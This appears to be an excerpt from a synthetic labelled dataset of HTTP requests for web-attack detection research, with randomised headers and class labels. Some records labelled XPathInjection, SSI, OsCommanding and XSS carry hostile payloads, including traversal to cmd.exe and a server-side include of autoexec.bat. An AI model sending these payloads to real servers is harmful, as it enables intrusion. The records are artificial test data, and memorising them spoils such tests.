Client-ip: 29.159.169.244
Cookie: we3eoe2raectd=4
Cookie2: $Version="6"
Date: Thu, 22 Dec 05 20:25:02 CET
ETag: "eymgqpKzdWID58x"
Expect: 8nggt=Iehr
From: ntca1@4fmcsegl.gov
If-Modified-Since: Fri, 25 Mar 05 03:18:43 UTC
If-Unmodified-Since: Sat, 19 Dec 09 02:14:11 GMT
If-Match: *
If-None-Match: "SqEBRJyFrjatiSsHRcdH"
If-Range: "TJ.ap@zM@jj2rOoKhHxK"
Max-Forwards: 93
MIME-Version: 9.8
Pragma: Imban=eushhyi
Proxy-Authorization: NTLM b3Q2OWN3aXJkc2xycmhyaGVldGRpYXg0c2llZHR1bmhqdEdvZnNoZWhy
Authorization: NTLM dGluYW9hbHR3bm1TYUt1ZW0yaWx0SHdUaXNvcjBQbDZpdG9semtlcmxlaWd4aXpi
Range: 834-
Referer: /qrzTer/datae/rcEdaoa.php4
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/9.1 (Windows; U; Win 9x 7.0; uT-2h; rv:7.8.7) Gecko/26273493
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5167x472
Via: 2.7 4.71.32.4, HTTP/4.6 119.189.227.71, is4op/9.4 www.igdH.css
Transfer-Encoding: identity
Upgrade: 4Siht/2.2
Warning: 422 www.tsahzte.tiff "ndnheiEmueo" "Fri, 27 Jan 06 13:37:13 GMT"
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 00056552698
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47700
Start - Id: 35876
class: XPathInjection
GET /DlinkUASStelnetY8QTformED1/dA1CxY1uKmIqu7CAFVII/sH@/Gautoexec0I@ZtLdeleteA4Oti.asp?c_pdropgqkH=+j&aeitiihst=rthuoSv%27+or++++count%28++++path%2Fchild%3A%3Anode%28%29%5Bposition%28+%29%3D%28%28+i++%2B+++j++++%2B++k+++%2B+++l++%2B++1%29%5D+++++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or++++%27nnsn%27++%3D++%27+++SjTmtUu%27++or&EhUnr=230240&os=2053&nuaUxqm=as%27sta%7Egi&sIl=oUjh&a6tmpimgg-TZ=%7Es%3D&T0scriptconnectFGJ=o%2Fhomee+tDwn&oesEsitjEl=ec&6catGHh=4u&heU3aAzca=jlnlh0l6ozaoi9enr&ra8ds=4234309 HTTP/1.1
Host: www.teaelo.net
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.4, deflate;q=0.6, compress
Accept-Language: 3gwmlal-iofT
Cache-Control: no-cache
Client-ip: 167.85.209.229
Cookie: h2s=244350;ftpEEe0dQQMPtb=762082;5xwl=5423;waee=imga8u(
Date: Fri, 08 Oct 04 22:36:09 CET
ETag: "j6_RBDMJQV7b5lSDIfdF"
Expect: 100-continue
From: suitS@oroHhO.fr
If-Modified-Since: Thu, 11 Mar 04 03:50:24 UTC
If-Unmodified-Since: Tue, 10 Jul 07 04:35:39 GMT
If-Match: "j6Rux0wYcW_xhFcn"
If-None-Match: "EnCVkpN1KDDdc_lP-"
If-Range: *
Max-Forwards: 9
MIME-Version: 4.5
Pragma: vedr='ak4jtI'
Proxy-Authorization: Digest nonce
Authorization: Digest opaque="ismyel"
Range: 39-2,823566-5763
Referer: http://6aaoxeg.uk/2ybmts1s/tdokS8jh.tar.gz
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/6.7 (Machintosh; U; PPC Mac OS X 4.8; om-ht; rv:7.7.2) Gecko/45227871
UA-Disp: 7612,056,16
UA-OS: Linux
UA-Color: color32
Via: 9.2 136.196.79.60
Transfer-Encoding: compress
Upgrade: hic/2.2, m8rwk1/9.9
Warning: 683 214.32.116.161 "fdrit" "Thu, 11 Jun 09 24:41:37 GMT"
X-Serial-Number: 160475
----: ----------------------------

null

End - Id: 35876
Start - Id: 36367
class: PathTransversal
GET /formmeta1X5pm5pautoexec_/oTIfRUJUoZ8wYmkaR/e1BW/tM2H-.-7gCjaBDz/B7vzAmQJwindow.openv/xRcfdI/0cKybP.Es8eGt9oVcc.jpg?aefolA3t1v=3ayya&ntaBuang2nc=s%3A%2F.htaccess%7E HTTP/1.0
Host: 56.46.186.174
Connection: keep-alive
Accept: audio/*, image/*;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 19.106.218.100
Cookie: Zmetad9N3ngg=yOMAc1ssg;lohnkisdif=igF;rsaft4otiu9iga=dnee;rw1tefssr=h4_q_oQiG1q;XncQ2cE=\f 'o;senEt=n19
Cookie2: $Version="09"
Date: Tue, 18 Nov 08 08:50:34 UTC
If-Modified-Since: Tue, 07 Feb 06 18:53:37 CET
If-Unmodified-Since: Sun, 13 Nov 05 11:07:16 UTC
If-Match: *
If-None-Match: "y1lqHipScwAWmmXK3WN."
If-Range: "EHTH6Uo7iPx7W8RuV"
Max-Forwards: 91
MIME-Version: 2.9
Pragma: u3oi='i'
Authorization: rraoiq yszdnbe=SEvzf
Range: -184,-23118,-675
Referer: /kTcrxdlu/oefxp/betm/rry2Pi/0rUbYeS.mspx
Trailer: If-Modified-Since
User-Agent: cLU1GOGn http://www.iYaI.net
UA-Disp: 285,7355,8
UA-Color: color16
Via: HTTP/8.5 204.22.236.180, FTP/2.7 www.vnisth.png:5
Transfer-Encoding: identity
Warning: 827 www.ec8sfnel.jpeg "rEAhcthwet" "Wed, 03 Mar 04 14:54:08 UTC"
X-Serial-Number: 29276576437166618904
----: ----------

null

End - Id: 36367
Start - Id: 49282
class: XPathInjection
GET /ceM-@ytx74@ca/hpR81AgFs/wo-dN-NoGe/9aonzdesrtloewmn6/-V/eajHlneazssna0iDn/1y3CJVg/melen1i5soaq75ohs5e/e4Ap/mUw/iStgPNFLQ6NmDKo/3NiqHH.nsf?QH.xK=einaitmg&iv5cUwPkBngT=462146190&ao=Biilwi%27++or+++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or++++%27irftkone%27++++%3D++++%27&brattalat=lEX&oHegGs=52840603&f8UrjnhauhctoZt=5465&nLsrfS=Ffaqbs3hwoc&eeuen9lr=like HTTP/1.1
Host: 147.136.110.148
Connection: axTtor
Accept: audio/*, application/*, image/*;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: ii=eeeaidnr
Client-ip: 226.125.42.173
Cookie: nzr=:ibetweene+
Cookie2: $Version="39"
Date: Wed, 25 Jan 06 07:29:45 CET
ETag: W/"fo6EYsaCceVK_1Da"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Sat, 03 Nov 07 21:37:55 GMT
If-Unmodified-Since: Tue, 25 Jul 06 09:23:46 UTC
If-Match: "GOvyS9qcbFxVNGoI6"
If-None-Match: "4KudhqUQ5Aq5tvloe"
If-Range: *
Max-Forwards: 168
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: NTLM ZWFTNWlvZXFpZXV0YWhuMHVuZGhhZG9xZXEwNW4wbmtkbnFu
Authorization: NTLM bW5hTWhGZWxnM2hhcG1ydXJ0dGNlaHFlR3Fyc3JjaG43bm1ucA==
Range: 305761-528973
Referer: /pdieeMR.swf
TE: trailers
Trailer: Trailer
User-Agent: lNtiErimaesv6eIesetl
UA-CPU: Sparc
UA-Disp: 3091,890,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 666x0440
Via: HTTP/9.4 www.udhma.gif, t9a/3.6 www.rnow.tiff, 5.9 www.ytahn.png
Transfer-Encoding: deflate
Upgrade: eso/2.4, aboa/1.7
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 55.91.27.185
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49282
Start - Id: 18297
class: Valid
GET /ejogtyrdiinn/e27vXC4UG/jlhuohoesikiie/s2BV90dUtu-/mPoyxsplTdJr/os8dfalItbnocuk2awt/7gj/9Bbfogcettcee1pct/hr/Ar.swf?rane0ea=408730&Gkf5xjnxtermQy=0hevao77eteuueihvi&NeEho1ms=oulGHc&8aigfzE=102&brm=lx-1y3a&jneeseSaiemgu=9o&udrlciasie8=%3En9e&nxhnuEcre=70117&89PhuTs6kt=iframefrom&el=ssQ%40&KQIamS=+sr%29E&wdZJYsxXZF=q6W&Oi3Jadmingroup byFP4P=03YCF0Z4&3tOthn=212538 HTTP/1.1
Host: www.ikwy.gov
Connection: close
Accept: */*;q=0.6
Accept-Charset: windows-874;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: min-fresh=2
Client-ip: 71.143.27.9
Cookie: heo0brgjret=n9CgZmOYCpfK;iazs1SoriFwr=407;njtissa=5yQj
Cookie2: $Version="49"
Date: Thu, 08 Jun 06 23:06:12 UTC
ETag: "@u3l8ojv12CM3I0QQw2"
Expect: 100-continue
From: drsH1i@mudidGibzl.gov
If-Modified-Since: Mon, 10 Jan 05 03:22:08 CET
If-Unmodified-Since: Mon, 13 Feb 06 10:56:15 CET
If-Match: "QVCbjNjMqKOz_l7qZf"
If-None-Match: *
If-Range: Thu, 12 May 05 06:52:52 UTC
Max-Forwards: 4917
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest username="l8rspce"
Authorization: Digest username="e8tAsug"
Range: -00,842627-,308-
Referer: http://P1esaG.st/h5urft/moenii2r/fell.mdb
TE: trailers,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.6 (Machintosh; U; Mac OS X 8.3; 2c-ir; rv:6.1.4) Gecko/10786117
UA-CPU: MIPS
UA-Disp: 644,336,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7711x8237
Via: 8.6 www.aelt.html, 7.9 www.advio.css:597
Transfer-Encoding: deflate
Upgrade: oiau7a/3.9, vedts/8.8
Warning: 800 47.8.50.190 "idsqnhsLOkfddsoeiea" 
X-Forwarded-For: 44.250.109.77
X-Serial-Number: 9583617026420490127
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18297
Start - Id: 22612
class: Valid
GET /xtOnph-veEse79sssam.shtml?R0@htacces1zFVnR=sT6dmmomgtxa&treht6de33soE=onetcathe1eeEe&Nss=replacenopthaving&o0l=5265 HTTP/1.1
Host: 56.6.193.171
Connection: keep-alive
Accept: text/html;q=0.2
Accept-Charset: x-mac-korean, iso-8859-15;q=0.0, iso-8859-8, cp-950
Accept-Encoding: identity;q=0.2, compress;q=0.9, identity
Accept-Language: rlBeec-axsaers, EDhotmc-he;q=0.5, oNaSII5-guaii;q=0.8
Cache-Control: max-stale=4705
Client-ip: 192.133.132.166
Cookie: 2eg=7975;beaOmtzmseaMrCN=tGrxMcvfi3q;sntanrtesji=j/n;dhetocyy3it=496;eat=4429103;Hehnamrdi9=30
Cookie2: $Version="62"
Date: Tue, 01 Nov 05 23:49:09 UTC
ETag: "SBLvx3V.@Glr-f1ZA"
Expect: 100-continue
From: tamegP8@NaDasMP.be
If-Modified-Since: Mon, 11 Sep 06 17:52:35 UTC
If-Unmodified-Since: Thu, 14 Jul 05 12:36:18 GMT
If-Match: *
If-None-Match: "Z@0zVFABmth3QQrR8YF"
If-Range: "v1_9WsvHFO30R0cU1x"
Max-Forwards: 72
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM dTNpZWZzOElnanR5aWV3YXM1bHJlaHRtc2RyQzZzZGVvd3BpdHQ2emhsdA==
Authorization: NTLM YWFYcXlkc2FuYXJmZnRlaThUb2Vlck55bm9hcmFlMmE1dElzaWNheW85
Range: 5809-2058
Referer: /7Istswie/tTyajt/arMmen.aspx
TE: trailers,chunked;q=0.0
Trailer: Pragma
User-Agent: 36shHO http://www.noPrs.be
UA-CPU: Sparc
UA-Disp: 0852,741,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9598x757
Via: 7.7 236.221.151.144
Transfer-Encoding: identity
Upgrade: txsikk/4.1, hnh/1.7, bte/4.1, eAsee/7.7, Ei7rcc/1.1
Warning: 649 www.3snl9.jpg:7772 "cetphelatiyt" 
X-Forwarded-For: 23.196.24.89
X-Serial-Number: 705834569346
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22612
Start - Id: 23401
class: Valid
GET /mZxadvdIbgziJ8ok/hL0H3uTayb6vw64pC/ez1YYqa8@m26v-4v0i/.z2pgy/miZCe/eCE@-pjjGL.IguE/5ucat@IMsamIXu.k.KQ/agyi.html?A6n=652&cuitnaceq=624&nlbsens=r&tsiaIwe9c=hHucAitreuefl&klyetaj=0287968357&glFnOe0H1xk=cdaruIxpt&iiemideUEhbr6=npwstL&tysaoaesicwy=fGtat&a8rwr=aScieeaaznsl&Cartvt5iof=84&sTdhuyo=8067285&aotrmkfTGeet5a=382&ltsz9h3=e2aimp%2FmNtn&eAUbden=51 HTTP/1.1
Host: 231.19.79.56:3816
Connection: hseeawot
Accept: audio/basic, audio/x-wav, audio/basic
Accept-Charset: iso-8859-8, iso-8859-8;q=0.4, windows-1257, windows-1253;q=0.7
Accept-Encoding: *;q=0.0
Accept-Language: tmd-zLhzhe, lsLIsa-ornte;q=0.4, os-l0hs;q=0.2
Cache-Control: sEhoa5d='uDOuue'
Client-ip: 165.248.217.148
Cookie: Sgom=6660
Cookie2: $Version="98"
Date: Fri, 20 Jul 07 08:27:55 CET
ETag: W/"u0hOJaQV.ZRqffTIUx"
Expect: 100-continue
From: a6sift@tQttntioi.fr
If-Modified-Since: Sun, 04 Jan 09 05:22:17 UTC
If-Unmodified-Since: Fri, 27 Jul 07 05:26:59 CET
If-Match: "-ubUxaxUcqPCNgJfK0F"
If-None-Match: "oOJ6SCWWIYWhL2tjHq-"
If-Range: "n9BocchgLwdiUbPwO7.2"
Max-Forwards: 2736
MIME-Version: 5.9
Pragma: le='Lo0q06cz'
Proxy-Authorization: Digest realm
Authorization: mrpsNk dnd9yiu=rnif
Range: 4420-,4-06,61-
Referer: /aayrst/nnby.asp
TE: deflate;q=0.3
Trailer: Connection
User-Agent: Mozilla/2.2 (Windows; U; Windows NT 4.3; wz-oy; rv:0.9.3) Gecko/63334878
UA-CPU: StrongARM
UA-Disp: 9336,5495,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 506x4645
Via: 0.1 www.hpweeiA.js, HTTP/6.5 204.19.137.208:075, 5.6 www.eneo.shtml
Transfer-Encoding: compress
Upgrade: afyagd/6.9, Lcmr8/4.4, yHo8/4.4, oeeIe8/7.6
Warning: 703 www.itpfele.gif "2bdi" "Thu, 20 Oct 05 06:22:20 GMT"
X-Forwarded-For: 95.103.231.158
X-Serial-Number: 329196523
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 23401
Start - Id: 40635
class: SSI
GET /ipIm5bGbl/DWzopBf/2g/ueExulWB@_Fcopyand/y6rCcwgetA/isell/a3Q@WPnR7HD/C42ETkXY/dtuV_vdBH/rjMr_CtmpVhttp0RLK7M/nR@SbgAxrQlT3xR0l.exe?Alibz=t&fCvitt=cu5o9ztr&cry2le7hNern=eexdUeBhfi&vshsszhsmaen=dPs%3Bqddwfhvqsair&d2ea2=slr+&RhgDT3rFVz=rmpaabb&9Xtqj=1&eorDnhOnpvnu=bzTscIhte&dvunp6jedtDt=26355&1tdfodawrsspno=%3C%21--%23include++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++++--%3E&ts=%7Cx HTTP/1.1
Host: www.de0ei.ch
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: windows-1253;q=0.8, windows-1250;q=0.2, iso-8859-5;q=0.3, cp-936
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: min-fresh=04433
Client-ip: 90.139.110.154
Cookie: lpUP_kuVA=9849960169;Hmjigt=o7uLdj;sulnaii=eht9ChDvEhibepH;hen=9106
Cookie2: $Version="80"
Date: Sun, 26 Feb 06 20:26:43 UTC
ETag: "m7wT1MXVgoZidB6ICIZ"
Expect: faesi3c
From: tzt2Rh@qI5nosnls.cz
If-Modified-Since: Sat, 26 Dec 09 01:11:33 CET
If-Unmodified-Since: Mon, 01 Mar 10 12:01:38 UTC
If-Match: "D6rjNjOl1y0RrKiJauLV"
If-None-Match: *
If-Range: "lXyBqmAI8Diln-23NTX"
Max-Forwards: 567
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: ctauis uahpegS=thr2
Authorization: NTLM cmZvYXBmcmE4Y3dhcGhpbmlyamJFb3RzcmFhbjlsbGlTbXA=
Range: -916,268-761609,54-38396
Referer: http://www.ree46e.uk/gyti3t/rsanaao/Swlsled/djet.asmx
TE: gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.8 (Windows; U; WinNT 7.0; 8c-et; rv:3.0.6) Gecko/69555668
UA-CPU: Sparc
UA-Disp: 959,926,32
UA-OS: WinNT
UA-Color: color16
Via: afeire/7.6 www.nGNm.png:7, FTP/7.6 www.batot.gif, 3.2 www.ndsreo.shtml
Transfer-Encoding: compress
Upgrade: 3ri/5.3, 3tr/9.3, daeuf/7.9, h2tiee/5.4, i6epn/2.5
Warning: 723 www.Uxehyne.html "ycdtssattZee" 
X-Forwarded-For: 197.32.78.234
X-Serial-Number: 9481598521
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40635
Start - Id: 17532
class: Valid
GET /obwinclude@PTYsamM/mf4KKo/k8/tXmrtorvog79sO/aznex/i8V@bN4DTd.su/3K.css? HTTP/1.1
Host: www.ItriqX.st
Connection: tnt4rr
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: Ahuo-t3;q=0.4, e0aOdaeo-rkcyH0;q=0.1
Cache-Control: max-stale=596
Client-ip: 97.28.180.226
Cookie: Mqnnr16Ar4=sain3uri374aet5e
Cookie2: $Version="136"
Date: Sun, 15 Jan 06 01:26:05 UTC
ETag: "1g_u5BtP8Mm9p3Op"
Expect: 100-continue
From: eqwswlc@oml3s.net
If-Modified-Since: Mon, 20 Jul 09 20:42:52 UTC
If-Unmodified-Since: Sat, 23 Apr 05 19:36:18 UTC
If-Match: "ye0ZcYYMtTUXVbp"
If-None-Match: *
If-Range: *
Max-Forwards: 865
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic YTFubDpleTFzbnVl
Authorization: NTLM aXJ0WGVrYTNpYm5uMG1laGxlNG5lOXJseW54ZXNhdGFpdWFvYg==
Range: -93,-08,01267-
Referer: http://www.ho9a.fr/A2ltt/hpKw/tbwi2oep/esnt/npr2Wnc.cfm
TE: trailers,deflate
Trailer: Range
User-Agent: Mozilla/4.1 (Windows; U; Windows NT 9.8; oy-RS; rv:1.0.7) Gecko/95810202
UA-CPU: StrongARM
UA-Disp: 7555,797,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 845x6872
Via: 1.1 www.tToEu.png, FTP/2.7 202.20.101.145
Transfer-Encoding: identity
Upgrade: fuSuX4/5.4, Pyeaes/7.2, nobos/1.0
Warning: 578 www.cuZgchp.tiff "esuto1wenhlasinfem" "Mon, 23 Mar 09 10:21:32 UTC"
X-Forwarded-For: 108.35.186.201
X-Serial-Number: 8525690441
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17532
Start - Id: 36540
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 190.16.192.71
Connection: viea
Accept: */*;q=0.6
Accept-Charset: isiri-3342;q=0.9
Accept-Encoding: *
Accept-Language: Ar-ahJ
Cache-Control: no-transform
Client-ip: 213.233.54.110
Cookie: teeb=hposition>]Edagsna;dotoaqwcrdzistl=1;mmitFsei=kLUoT1I;6aQn=srshai;il=e4csp;2Eri1Ytz=eO0pnnoht5ervawae
Cookie2: $Version="973"
Date: Sat, 05 Nov 05 22:22:09 GMT
ETag: W/"4@2UTwY0@UxnP2T2A"
Expect: 100-continue
From: qslOdEWa@reveTya6.com
If-Modified-Since: Sun, 04 Jun 06 01:40:38 GMT
If-Unmodified-Since: Sat, 09 Jun 07 12:55:59 GMT
If-Match: "YH8pDTSMDUMrn@@zg"
If-None-Match: "DRah4eYE.S8OiDb"
If-Range: *
Max-Forwards: 37
MIME-Version: 3.0
Pragma: n0=Fqvn
Proxy-Authorization: Basic MnNlMG9hb1U6endvb2N0cW8=
Authorization: NTLM dHQwYnRHeWRvbXNheXJjZW5oZWloZWE5T3JlbmlzOTJuazBzaHdMdGhlYW5uMmh4
Range: 9206-,968-
Referer: http://www.ri7opE.org/hnmjohYu/tcAp/BkwYI.dll
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: htuoul/9.3.7
UA-CPU: x86
UA-Disp: 1693,583,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 547x5195
Via: dTei/6.1 www.Benn.gif
Transfer-Encoding: compress
Upgrade: ildtt/8.0
Warning: 826 69.77.188.222 "hEdhtjuthB0Ezshecem" 
X-Forwarded-For: 149.92.182.203
X-Serial-Number: 55534835625911216707
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36540
Start - Id: 9068
class: Valid
GET /Nfromstdin2_AH9r/i@54qvXTiVZgwBOcudp/rI_aMzQ/oMpd8V5wStHVrhKU/pZGT6@KIwFBYk4/ROn/smG_cIURnRls3.php3?y3npR1-idcJn=26072&eeioera=snhs&cedlARghnsi4sgd=lK3ca&G17M1=eMleytaype9rbaten&mcve=2667&ssl5zmteE0f6a=r&teioh=52&b9eLtO5exhd=ootquT1seorw&Aqprocessing-instructionZt@6z=aBpewinntqaevalh&e4=csh&bemnyCosrtba=pl8u5F1AIX&ar25afeEseaTl=sdwOtpjdas2&fapMtlosei6le=Ln&qwaZ7ZVHD1=dkelocationeEi%5DRc+2i HTTP/1.1
Host: www.dgoas.st
Connection: keep-alive
Accept: text/html;q=0.8
Accept-Charset: us-ascii;q=0.0, x-mac-korean;q=0.0
Accept-Encoding: 
Accept-Language: aidxda-omatEdde, oae7M-lueatwE, moirrnA-e1n, oeE-Etanr9D;q=0.8
Cache-Control: min-fresh=8740
Client-ip: 3.88.112.11
Cookie: -LUBs2z=eg mgh ltu7om u;xhokn4assetl3or=d6Z annRtAsnsai;OgwinntUlikeEdrop=?a;sF5obinSorq1=462873565
Cookie2: $Version="18"
Date: Fri, 25 Mar 05 03:49:47 GMT
ETag: "-t_M7Pmt4dX-01X"
Expect: 100-continue
From: ueP9ir@rAnlhe.it
If-Modified-Since: Wed, 20 May 09 19:29:49 CET
If-Unmodified-Since: Wed, 09 Jan 08 07:43:08 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 14 May 07 06:40:15 GMT
Max-Forwards: 140
MIME-Version: 2.4
Pragma: 5xhbojdt=oOkgm9t8
Proxy-Authorization: rneu expZ=5wizus
Authorization: NTLM clN1eG5laE9pYW1tY2Z5YWF1bmhvY2FhczNzdTR5bmZuVGVoaW55YWU=
Range: 749326-1,361-,-463170
Referer: /3ap3/tyrtss/nim7/esonmuns/22ii.ace
TE: trailers,trailers
Trailer: Connection
User-Agent: osaulaw (bhUyvyu; lu7S01; ouSOTv; 51gFEeWXvn; ekKpWYzO)
UA-CPU: 68000
UA-Disp: 6130,9479,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 582x1826
Via: 2.7 221.187.2.156, 4.7 240.229.201.226, vuIds/1.4 93.67.200.203
Transfer-Encoding: whtd8; n02ugns=UitlmXi
Upgrade: Ektmi/4.4, l0dr/4.3, sifbE/1.7, ejpbmd/3.6
Warning: 991 177.26.146.73 "etpo8OtaAfvisutud9o" "Tue, 12 Dec 06 02:41:54 UTC"
X-Forwarded-For: 41.199.240.170
X-Serial-Number: 442361
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 9068
Start - Id: 47329
class: XSS
GET /iUmaSj4Fo2M@8.wx/End4asaU0ngfnh/eweineooptbede/bTJM0fz_PuMyVEePa/qraceXD51/eeAke1i138h/j.XCo0.png?dO6taTe=9sRdtin&AlFhGQP8yw=%3Cobject+classid++%3D%22clsid%3A...+%22+codebase++++%3D+%22+++javascript%3A++++%5Balert+++%28%27icut%27%29%3B%5D%22%3E&e0iaoeiEieelh=3674195&ahnsampunDSeti=331&enaetC=874226&Ienmec=aiehit%5C+nsnmlstylea%3Bwh%7E&eyYI6IOBE=oln&dbt=ewts2arteeeodnn&oD=gu9a&I3rdroa8by=nsl&iTnrteadbpsan=95572&nhdooT3ngnc=86622 HTTP/1.1
Host: 252.247.93.168:81
Connection: close
Accept: image/gif, audio/x-wav;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: sE-oalEpcn, mehI-d, ll8drxe-tertH, 3hsia-q;q=0.9
Cache-Control: no-transform
Client-ip: 68.164.101.129
Cookie: teostnoeze=tehs;qyKz=68667084;ieidadz=lras;twhoc6=tfrm9pnais
Cookie2: $Version="4"
Date: Fri, 14 May 04 20:45:34 CET
ETag: "z6o_GAUk0@qlTgH0GaT."
Expect: 100-continue
From: ueasrS@d1jogree.it
If-Modified-Since: Sun, 07 Jan 07 05:35:51 GMT
If-Unmodified-Since: Fri, 12 Feb 10 14:21:08 GMT
If-Match: *
If-None-Match: *
If-Range: "SH6cwk7Ohr@yOQp"
Max-Forwards: 1125
MIME-Version: 3.5
Pragma: lgEt61='ea'
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Basic c3NkQmV0b3Q6YXAxemNlYQ==
Range: -827060,69-,229-399617
Referer: /etha/bseloll.tiff
TE: trailers,chunked;q=0.6,trailers
Trailer: If-Match
User-Agent: Mozilla/3.4 (compatible; Konqueror/5.2; Windows NT; 1eAIhd3sl; tehl)
UA-CPU: 68000
UA-Disp: 699,6656,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6004x311
Via: agt/8.6 217.82.49.45, 0.5 www.ithntm.css, 7.0 34.221.231.196
Transfer-Encoding: compress
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 254.218.8.107
X-Serial-Number: 4902698707651881183
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47329
Start - Id: 29053
class: Valid
GET /zuXjZN80xjKYw/iHKtUre5Zwd15/oitoesgrjOiteel/BtvsEusrE_OZ7U6p_/oc6sttr/oGTYTOwDu.Fz4access_logV/nHII_R/a15xcsK6teotsb/h58l-VWvXvt1/dGB/q0f@V.js? HTTP/1.0
Host: www.hmFeaeSdl.net
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: n-s, a7ec-zd5mu;q=0.2
Cache-Control: max-age=29737
Client-ip: 70.47.116.196
Cookie: pa=catssA dme?65;NyhoonenemEans=jIw2P-8u
Cookie2: $Version="4"
Date: Thu, 18 May 06 06:29:05 UTC
ETag: W/"d3L31OQISYMur0Njhkw"
Expect: 100-continue
From: te6nde@Ieee0ntr7.net
If-Modified-Since: Fri, 09 May 08 16:04:00 CET
If-Unmodified-Since: Thu, 23 Jul 09 05:45:01 UTC
If-Match: *
If-None-Match: "ww5yT7oefMcJeqngDX"
If-Range: *
Max-Forwards: 37
MIME-Version: 5.4
Pragma: eheo8cn='io'
Proxy-Authorization: gssa mdooRR=usOT
Authorization: Basic dllkbjppN3l0cg==
Range: 2-728395,2-644,-332
Referer: /kdibanij/sisum/iheouy/jAvwyrth.cgi
TE: trailers,gzip
Trailer: Max-Forwards
User-Agent: tBY7yklo http://www.63tlocm.uk
UA-CPU: x86
UA-Disp: 3428,2745,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 890x9958
Via: wba4we/8.4 www.lnd4a.tiff, 4.2 www.n4zd.tiff:9203
Transfer-Encoding: 1nsoa; ruuson=solet
Upgrade: Ymaeea/2.1, onqsd/4.3
Warning: 278 www.tcotssn.tiff "t1rotxxS" "Thu, 11 Nov 04 16:16:21 UTC"
X-Forwarded-For: 251.84.212.195
X-Serial-Number: 1881707
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 29053
Start - Id: 25356
class: Valid
GET /hitcz/npS.8d1Nnnklike/ado87nhfeEPhdnsrla/N1jyQ1b7r/v-w1Vdrop-9/oeepa0ee/cKhER1FRfLedCJbjn.php3?xroTedwpnsnrh3e=761210&cKzyzW.=143&XLJI=execio%5DxmlNbi%5Bpnt1abd&seiujzo=%26ninb%3Edocumentpassthru%5Brlirbi0dwio%25u&nph-dxmlEa=57185&8processing-instructionP4Ybgsoundlqinsert=qScnaj&tk=ty&Hste=MsN&ds6=tynscripth+0rNmfsrat&hItAeaofAk=yaie3&edhyn=2l5n&alEt=r1ePCrmCF%40&snin=wlirZh+aas HTTP/1.1
Host: www.ge7dfld.fr:2442
Connection: lhDtm
Accept: application/postscript
Accept-Charset: iso-8859-9;q=0.6, euc-cn;q=0.0, iso-8859-9, iso-8859-3
Accept-Encoding: *;q=0.6
Accept-Language: aOg3cu-h, tpto-gI2sr;q=0.4, rcdot-roo;q=0.9
Cache-Control: max-age=1920
Client-ip: 116.248.127.206
